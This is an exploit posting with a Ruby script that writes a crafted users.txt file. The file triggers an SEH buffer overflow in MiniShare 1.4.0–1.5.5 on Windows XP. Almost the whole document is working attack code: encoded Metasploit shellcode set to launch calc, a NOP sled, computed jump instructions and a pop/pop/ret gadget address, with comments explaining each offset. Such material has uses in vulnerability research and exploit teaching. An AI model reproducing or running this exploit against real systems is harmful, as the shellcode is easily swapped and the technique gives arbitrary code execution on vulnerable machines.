minishare155seh-overflow.txt
Posted on 04 November 2010
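# Exploit Title: Minishare 1.5.5 Buffer Overflow Vulnerability (SEH)
# Date: 11/03/2010
# Author: Muhamad Fadzil Ramli - mind1355[at]gmail[dot]com
# Credit/Bug Found By: Chris Gabriel
# Software Link: http://sourceforge.net/projects/minishare
# Version: 1.4.0 - 1.5.5
# Tested on: Windows XP SP3 EN (VMWARE FUSION - Version 3.1.1)
# CVE: N/A
#! /usr/bin/env ruby
#
# Writes a 1000-byte users.txt whose layout overwrites an SEH record.
# Control flow once the handler fires:
#   (1) SEH      -> pop/pop/ret gadget, lands on nSEH
#   (2) nSEH     -> short jmp 7 bytes back, onto the near jmp
#   (3) near jmp -> 0x168 (360) bytes back, into the NOP sled -> shellcode
#
# NOTE(review): only the file is produced here; how users.txt reaches the
# vulnerable parser (presumably MiniShare's own directory) is not shown.
# 0x0040B145 is image-specific (presumably minishare.exe, non-ASLR on XP)
# and must be re-verified against the exact build under test.
#
# Every piece is forced to ASCII-8BIT: on Ruby >= 1.9 concatenating the
# high-byte "\x.." literals (tagged with the UTF-8 source encoding) with the
# packed addresses (ASCII-8BIT) raises Encoding::CompatibilityError.

filename = 'users.txt'

# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
shellcode = [
  "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc",
  "\xd9\x74\x24\xf4\xb1\x1e\x58\x31\x78",
  "\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85",
  "\x30\x78\xbc\x65\xc9\x78\xb6\x23\xf5",
  "\xf3\xb4\xae\x7d\x02\xaa\x3a\x32\x1c",
  "\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21",
  "\xe7\x96\x60\xf5\x71\xca\x06\x35\xf5",
  "\x14\xc7\x7c\xfb\x1b\x05\x6b\xf0\x27",
  "\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3",
  "\xf7\x3b\x7a\xcf\x4c\x4f\x23\xd3\x53",
  "\xa4\x57\xf7\xd8\x3b\x83\x8e\x83\x1f",
  "\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6",
  "\xf5\xc1\x7e\x98\xf5\xaa\xf1\x05\xa8",
  "\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61",
  "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f",
  "\x59\x90\x7b\xd7\x05\x7f\xe8\x7b\xca"
].join.b

# E9 rel32 = 0xFFFFFE98 = -0x168 (-360): from the byte after this jmp
# (offset 386) that lands at offset 26, inside the NOP sled.
nearjmp = "\xe9\x98\xfe\xff\xff".b

# nSEH: EB F9 = short jmp -7 (the trailing FF FF are never executed).
# Executed at offset 386 -> EIP 388 - 7 = 381 = start of nearjmp.
nseh = [0xfffff9eb].pack('V')

# SEH handler: pop pop ret gadget (see NOTE above about re-verifying it).
seh = [0x0040B145].pack('V')

# NOP sled padding so that nearjmp ends exactly at offset 386, where the
# nSEH/SEH record is overwritten.
junk1 = "\x90".b * (386 - (shellcode + nearjmp).bytesize)
# Filler to reach the fixed 1000-byte total.
junk2 = 'B'.b * (1000 - (junk1 + shellcode + nearjmp + nseh + seh).bytesize)

# offsets: [0..236 nops][237..380 shellcode][381..385 near jmp]
#          [386..389 nseh (short jmp)][390..393 seh (pop pop ret)][394.. junk2]
xploit = junk1 + shellcode + nearjmp + nseh + seh + junk2

# Layout sanity checks: the record offsets above are what the jumps assume.
abort "bad shellcode length #{shellcode.bytesize}" unless shellcode.bytesize == 144
abort "bad payload length #{xploit.bytesize}" unless xploit.bytesize == 1000

# Binary mode so no newline translation can corrupt the payload on Windows.
File.binwrite(filename, xploit)
puts "file size : #{xploit.bytesize}"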